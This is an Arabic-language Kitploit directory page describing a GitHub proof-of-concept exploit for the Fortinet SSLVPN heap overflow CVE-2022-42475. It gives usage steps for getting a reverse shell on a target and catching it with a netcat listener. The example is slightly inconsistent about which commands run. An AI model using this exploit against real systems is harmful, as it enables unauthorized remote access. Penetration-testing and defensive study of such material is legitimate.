Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2022-42475-Fortinet — استغلال Python لـ CVE-2022-42475 تجاوز سعة الكومة في برنامج Fortinet SSLVPN الخفي. يوفر قشرة عكسية عبر pwntools مع هدف ومنفذ وأوامر قابلة للتخصيص. | Kitploit
أدوات/GitHubGitHub/mustafa1986/cve-2022-42475-fortinet
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقأداة الوصول عن بعداستغلال الملفات الثنائية
GitHubmustafa1986/cve-2022-42475-fortinet

cve-2022-42475-Fortinet

استغلال Python لـ CVE-2022-42475 تجاوز سعة الكومة في برنامج Fortinet SSLVPN الخفي. يوفر قشرة عكسية عبر pwntools مع هدف ومنفذ وأوامر قابلة للتخصيص.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
133منذ 3 سنواتلم تتم المراجعة بعد
مشاركة

cve-2022-42475

كود POC لاستغلال تجاوز سعة الكومة (Heap Overflow) في برنامج SSLVPN الخفي لشركة Fortinet

الاستخدام

pip install pwntools لاستخدام هذا الكود، يمكنك حفظه في ملف، مثلاً exploit.py، ثم تشغيله باستخدام Python في سطر الأوامر مع تمرير الوسائط المطلوبة. إليك مثالاً لأمر تشغيل هذا الاستغلال:

python exploit.py <target_host> <target_port> <reverse_ip>

استبدل <target_host> باسم المضيف أو عنوان IP للنظام المستهدف، و<target_port> برقم منفذ الخدمة الضعيفة، و<reverse_ip> بعنوان IP للجهاز الذي تريد استقبال الصدفة عليه. أما الوسائط المتبقية فهي الأوامر التي تريد تنفيذها، مفصولة بمسافات.

على سبيل المثال، إذا كان عنوان IP للنظام المستهدف هو 192.168.0.100، والخدمة الضعيفة تعمل على المنفذ 8080، وتريد تنفيذ الأمرين ls و id، فستشغل الأمر التالي:

python exploit.py 192.168.0.100 8080 192.168.0.101 id

سيؤدي هذا إلى إنشاء اتصال صدفة عكسية بالعنوان 192.168.0.101:31337 وتنفيذ الأمرين ls و id على النظام المستهدف. لاحظ أنك ستحتاج إلى تشغيل مستمع (listener) على عنوان IP والمنفذ المحددين لاستقبال الصدفة العكسية. يمكنك استخدام أدوات مثل ncat أو netcat لإنشاء مستمع.

تنزيل الأداة